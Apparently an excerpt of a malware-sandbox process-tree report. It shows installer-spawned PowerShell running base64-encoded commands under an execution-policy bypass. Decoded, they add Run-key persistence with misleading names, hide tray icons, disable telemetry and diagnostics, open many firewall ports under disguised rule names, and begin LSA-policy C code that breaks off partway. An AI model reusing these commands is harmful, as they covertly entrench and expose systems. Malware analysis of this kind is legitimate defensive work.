vAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACIAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAbQBhAGsAZQAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAbQBhAGsAZQAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBtAGEAawBlACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBtAGEAawBlACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAZQBkAGkAdAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAZQBkAGkAdAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBlAGQAaQB0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBlAGQAaQB0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA=
      4⤵
      PID:1504
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:868
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss555B.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5548.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5549.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr554A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcACIAIAAtAE4AYQBtAGUAIAAiAEUAeABwAGwAbwByAGUAcgAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAFQAcgBhAHkASQB0AGUAbQBzAEQAaQBzAHAAbABhAHkAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAIgAgAC0ATgBhAG0AZQAgACIARQB4AHAAbABvAHIAZQByACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAE4AbwBUAHIAYQB5AEkAdABlAG0AcwBEAGkAcwBwAGwAYQB5ACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQA=
      4⤵
      PID:1984
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:616
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5EE2.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5EBF.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5EC0.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr5EC1.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:1964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuAFwAIgAgAC0ATgBhAG0AZQAgAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAgAC0AVgBhAGwAdQBlACAAMAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAQQBsAGwAbwB3AEMAbwByAHQAYQBuAGEAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgAKAEcAZQB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBQAGEAdABoACAAIgBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAE0AZQBtAG8AcgB5AEQAaQBhAGcAbgBvAHMAdABpAGMAXAAiACAAfAAgAEQAaQBzAGEAYgBsAGUALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAAoARABpAHMAYQBiAGwAZQAtAE0ATQBBAGcAZQBuAHQAIAAtAG0AYwAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABTAGUAcgB2AGkAYwBlACIAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAOAAwACwAIAA0ADQAMwAsACAAMgAwADIAMAAsACAAMgAyADIAMgAsACAAMwAxADAAMAAsACAAMwAzADMAMwAsACAANAAwADQAMAAsACAANAA0ADQANAAsACAANAA0ADQAOQAsACAANgAwADYAMAAsACAAOAAwADgAMAAsACAAOAA4ADgAOAAsACAAOQAyADAAMAAsACAAMQAwADEAMgA4ACwAIAAxADAANgAwADAALAAgADEAMAA2ADQAMwAsACAAMQAyADAAMgAwACwAIAAxADgAOAA4ADgALAAgADEAOAAxADkAMgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABDAG8AbgB0AHIAbwBsACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAQwBvAG4AdAByAG8AbAAiACAALQBHAHIAbwB1AHAAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADIAMgAyACwAIAAzADEAMAAwACwAIAAzADMAMwAzACwAIAA0ADAANAAwACwAIAA0ADQANAA0ACwAIAA0ADQANAA5ACwAIAA2ADAANgAwACwAIAA4ADAAOAAwACwAIAA4ADgAOAA4ACwAIAA5ADIAMAAwACwAIAAxADAAMQAyADgALAAgADEAMAA2ADAAMAAsACAAMQAwADYANAAzACwAIAAxADIAMAAyADAALAAgADEAOAA4ADgAOAAsACAAMQA4ADEAOQAyACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBQAHIAbwB0AG8AYwBvAGwAIABUAEMAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBSAG8AdQB0AGUAcgBXAGUAYgAgAFAAYQBjAGsAYQBnAGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAUgBvAHUAdABlAHIAVwBlAGIAIABQAGEAYwBrAGEAZwBlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFIAbwB1AHQAZQByAFcAZQBiACAAUABhAGMAawBhAGcAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADIAMgAyACwAIAAzADEAMAAwACwAIAAzADMAMwAzACwAIAA0ADAANAAwACwAIAA0ADQANAA0ACwAIAA0ADQANAA5ACwAIAA2ADAANgAwACwAIAA4ADAAOAAwACwAIAA4ADgAOAA4ACwAIAA5ADIAMAAwACwAIAAxADAAMQAyADgALAAgADEAMAA2ADAAMAAsACAAMQAwADYANAAzACwAIAAxADIAMAAyADAALAAgADEAOAA4ADgAOAAsACAAMQA4ADEAOQAyACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AUAByAG8AdABvAGMAbwBsACAAVQBEAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFIAbwB1AHQAZQByAFcAZQBiACAAUABhAGMAawBhAGcAZQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBSAG8AdQB0AGUAcgBXAGUAYgAgAFAAYQBjAGsAYQBnAGUAIABDAG8AbgB0AHIAbwBsACIAIAAtAEcAcgBvAHUAcAAgACIAUgBvAHUAdABlAHIAVwBlAGIAIABQAGEAYwBrAGEAZwBlACAAQwBvAG4AdAByAG8AbAAiACAALQBMAG8AYwBhAGwAUABvAHIAdAAgADgAMAAsACAANAA0ADMALAAgADIAMAAyADAALAAgADIAMgAyADIALAAgADMAMQAwADAALAAgADMAMwAzADMALAAgADQAMAA0ADAALAAgADQANAA0ADQALAAgADQANAA0ADkALAAgADYAMAA2ADAALAAgADgAMAA4ADAALAAgADgAOAA4ADgALAAgADkAMgAwADAALAAgADEAMAAxADIAOAAsACAAMQAwADYAMAAwACwAIAAxADAANgA0ADMALAAgADEAMgAwADIAMAAsACAAMQA4ADgAOAA4ACwAIAAxADgAMQA5ADIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFUARABQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
      4⤵
      PID:1368
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2448
    - - C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "1368" "1344"
        5⤵
        
        PID:1536
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6608.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi65F5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr65F6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr65F7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2296
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAjAGQAZQBmAGkAbgBlACAAVQBOAEkAQwBPAEQARQAKACMAZABlAGYAaQBuAGUAIABfAFUATgBJAEMATwBEAEUACgAKACMAaQBuAGMAbAB1AGQAZQAgADwAdwBpAG4AZABvAHcAcwAuAGgAPgAKACMAaQBuAGMAbAB1AGQAZQAgADwAbgB0AHMAZQBjAGEAcABpAC4AaAA+AAoAIwBpAG4AYwBsAHUAZABlACAAPABuAHQAcwB0AGEAdAB1AHMALgBoAD4ACgAjAGkAbgBjAGwAdQBkAGUAIAA8AFMAZABkAGwALgBoAD4ACgAKAHYAbwBpAGQAIABJAG4AaQB0AEwAcwBhAFMAdAByAGkAbgBnACgAUABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAEwAcwBhAFMAdAByAGkAbgBnACwAIABMAFAAVwBTAFQAUgAgAFMAdAByAGkAbgBnACkACgB7AAoAIAAgACAAIABEAFcATwBSAEQAIABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAA7AAoACgAgACAAIAAgAGkAZgAgACgAUwB0AHIAaQBuAGcAIAA9AD0AIABOAFUATABMACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBCAHUAZgBmAGUAcgAgAD0AIABOAFUATABMADsACgAgACAAIAAgACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AEwAZQBuAGcAdABoACAAPQAgADAAOwAKACAAIAAgACAAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATQBhAHgAaQBtAHUAbQBMAGUAbgBnAHQAaAAgAD0AIAAwADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAAgAD0AIAB3AGMAcwBsAGUAbgAoAFMAdAByAGkAbgBnACkAOwAKACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AEIAdQBmAGYAZQByACAAPQAgAFMAdAByAGkAbgBnADsACgAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBMAGUAbgBnAHQAaAAgAD0AIAAoAFUAUwBIAE8AUgBUACkAUwB0AHIAaQBuAGcATABlAG4AZwB0AGgAIAAqACAAcwBpAHoAZQBvAGYAKABXAEMASABBAFIAKQA7AAoAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATQBhAHgAaQBtAHUAbQBMAGUAbgBnAHQAaAAgAD0AIAAoAFUAUwBIAE8AUgBUACkAKABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAAgACsAIAAxACkAIAAqACAAcwBpAHoAZQBvAGYAKABXAEMASABBAFIAKQA7AAoAfQAKAAoATgBUAFMAVABBAFQAVQBTACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAEwAUABXAFMAVABSACAAUwBlAHIAdgBlAHIATgBhAG0AZQAsACAARABXAE8AUgBEACAARABlAHMAaQByAGUAZABBAGMAYwBlAHMAcwAsACAAUABMAFMAQQBfAEgAQQBOAEQATABFACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUAKQAKAHsACgAgACAAIAAgAEwAUwBBAF8ATwBCAEoARQBDAFQAXwBBAFQAVABSAEkAQgBVAFQARQBTACAATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwA7